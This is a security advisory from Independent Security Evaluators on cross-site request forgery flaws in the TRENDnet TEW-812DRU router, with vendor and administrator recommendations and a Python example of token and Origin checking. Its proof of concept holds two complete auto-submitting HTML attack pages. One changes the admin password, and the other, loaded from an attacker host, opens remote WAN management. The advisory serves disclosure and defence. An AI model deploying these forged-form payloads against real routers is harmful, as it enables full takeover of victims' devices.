Taking over the TRENDnet TEW-812DRU

[return to summary]

  • The TEW-812DRU can be taken over by a remote adversary through a CSRF attack.

Description

The TRENDnet TEW-812DRU router is susceptible to several Cross-Site Request Forgery (CSRF) attacks, which allow an attacker to forge HTML forms and have the router execute actions on behalf of a legitimate, logged-in user. ISE created a proof of concept that, when executed by an unsuspecting device administrator, changes the administrator credentials and enables the remote web management service.

Attack Requirements

  • The victim must have an active management session with the TRENDnet TEW-812DRU router.
  • The victim must be fooled into performing an action (e.g., by clicking an attacker-provided link), must browse to a malicious or compromised site, or must be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the TRENDnet TEW-812DRU are susceptible to Cross-Site Request Forgery.

  • Vulnerable firmware: version 1.0.8.0.
  • Other firmware versions were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Cross-Site Request Forgery can be prevented by including an unpredictable (cryptographically random) token in every state-changing HTTP request submitted to the web server, and validating it server-side before the request is processed. At a minimum, these tokens should be unique to each user session, but it is recommended that each HTML form delivered contain its own unique token.
  • In addition to HTML form tokens, HTTP Referer (and, where the browser sends it, Origin) header checking should be enabled, so that requests whose stated source is not the router's own management interface are rejected.
  • Additional information for vendors regarding immediate and long-term fixes for these issues can be found on our summary page.
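The two recommendations above, worked into one server-side check, as an added example that is not part of the original advisory and not TRENDnet's firmware code. It assumes a session identifier is already established (the session_id parameter), that the management interface lives at the hypothetical origin http://192.168.10.1, and that each form action (such as /setSysAdm.cgi) is protected by a one-time token bound to both the session and that action. The forged requests in the test mirror the proof of concept below: a POST with the attacker's page as its Origin and no token.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the router's own management UI (hypothetical value for this example).
TRUSTED_ORIGIN = "http://192.168.10.1"


class CsrfGuard:
    """Per-form, per-session anti-CSRF tokens plus Origin/Referer checking.

    A token is "<nonce>.<HMAC(key, session_id | form_action | nonce)>", so a token
    issued for one session and one form cannot be replayed in another session or
    against a different form action. Nonces are single-use.
    """

    def __init__(self, server_key=None):
        # Key lives only in server memory; rotating it invalidates all outstanding tokens.
        self._key = server_key or secrets.token_bytes(32)
        self._nonces = {}  # session_id -> set of outstanding nonces

    def _mac(self, session_id, form_action, nonce):
        msg = "\0".join((session_id, form_action, nonce)).encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def issue_token(self, session_id, form_action):
        """Called when the form is rendered; the value goes into a hidden field."""
        nonce = secrets.token_hex(16)
        self._nonces.setdefault(session_id, set()).add(nonce)
        return nonce + "." + self._mac(session_id, form_action, nonce)

    def _token_ok(self, session_id, form_action, token):
        nonce, sep, mac = token.partition(".")
        if not sep or nonce not in self._nonces.get(session_id, ()):
            return False  # unknown, expired or already-used nonce
        if not hmac.compare_digest(mac, self._mac(session_id, form_action, nonce)):
            return False  # token was minted for another session or another form
        self._nonces[session_id].discard(nonce)  # one-time use
        return True

    @staticmethod
    def _origin_ok(headers):
        """Prefer Origin; fall back to Referer; reject if neither names our origin."""
        origin = headers.get("Origin")
        if origin is not None:
            return origin.rstrip("/") == TRUSTED_ORIGIN
        referer = headers.get("Referer")
        if referer:
            u = urlsplit(referer)
            return "%s://%s" % (u.scheme, u.netloc) == TRUSTED_ORIGIN
        return False  # a state-changing request with no source header is refused

    def check_request(self, session_id, form_action, headers, form):
        """Return True only if both the source header and the form token are valid."""
        if not self._origin_ok(headers):
            return False
        return self._token_ok(session_id, form_action, form.get("csrf_token", ""))


def demo():
    """Legitimate submission vs. forged submissions shaped like the proof of concept."""
    guard = CsrfGuard()
    sid = "session-abc"  # constructed session id
    tok = guard.issue_token(sid, "/setSysAdm.cgi")
    good_hdrs = {"Origin": TRUSTED_ORIGIN}
    good_form = {"csrf_token": tok, "admuser": "admin", "admpass": "new-password"}

    # Forged: browser-supplied Origin is the attacker's page, and no token is present.
    forged_hdrs = {"Origin": "http://192.168.0.100"}
    forged_form = {"admuser": "admin", "admpass": "ISE"}

    return {
        "legitimate": guard.check_request(sid, "/setSysAdm.cgi", good_hdrs, good_form),
        "replay": guard.check_request(sid, "/setSysAdm.cgi", good_hdrs, good_form),
        "forged": guard.check_request(sid, "/setSysAdm.cgi", forged_hdrs, forged_form),
    }
```

The Origin/Referer check alone is not sufficient (some browsers and proxies strip Referer, and an attacker who controls the network can rewrite headers), which is why the token is validated as well; the two checks fail independently.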

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page.

Proof of Concept

In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Because the administrator has a current session established with the router, the browser attaches the session credentials to each cross-site submission and the router, lacking any anti-CSRF token or source check, processes the form submissions as if the administrator had made them.

The first form (Figure 1) is pre-filled with the information required to change the administrative credentials used to configure the router. The form is automatically submitted, and the victim's browser is then directed to a second page.


<html>

<head>
<title> TRENDnet TEW-812DRU CSRF - Change Admin Credentials.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<!-- Hidden fields mirror the router's own admin-credentials form; the victim never sees them. -->
<form name="trendCSRF" action="http://192.168.10.1/setSysAdm.cgi" method="post">
<input type="hidden" name="page" value="/adm/management.asp"/>
<input type="hidden" name="admuser" value="admin"/>
<input type="hidden" name="admpass" value="ISE"/>
<input type="hidden" name="AuthTimeout" value="600"/>
</form>

<script>
/* Submit the forged form immediately; the victim's browser sends it with the router session attached. */
function tnetCSRF1() {document.trendCSRF.submit();};
window.setTimeout(tnetCSRF1, 0);
/* Then load the second attack page (hosted on the attacker's server) to enable remote management. */
function tnetCSRF2() {window.open("http://192.168.0.100/CSRF2.html");};
window.setTimeout(tnetCSRF2, 0);
</script>

</body>
</html>

Figure 1. Attack page 1.

This second page (Figure 2) is pre-filled with the information required to enable remote management. Again, the form is automatically submitted on behalf of the victim.


<html>

<head>
<title> TRENDnet TEW-812DRU CSRF - Enable Remote Management.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<!-- Hidden fields mirror the router's remote-management form: enable it on WAN port 31337. -->
<form name="trendCSRF" action="http://192.168.10.1/uapply.cgi" method="post">
<input type="hidden" name="page" value="/adm/management.asp"/>
<input type="hidden" name="remote_en" value="1"/>
<input type="hidden" name="http_wanport" value="31337"/>
<input type="hidden" name="action" value="Apply"/>
<input type="hidden" name="apply_do" value="setRemoteManagement"/>
</form>

<script>
/* Submit the forged form immediately on page load. */
function tnetCSRF1() {document.trendCSRF.submit();};
window.setTimeout(tnetCSRF1, 0);
</script>

</body>
</html>

Figure 2. Attack page 2.

At this point the attacker knows the new administrator credentials and the router's web management interface is reachable from the WAN on the chosen port, so the attacker can remotely administer, and thereby remotely control, the router.

References

  • None.

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular TRENDnet TEW-812DRU hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io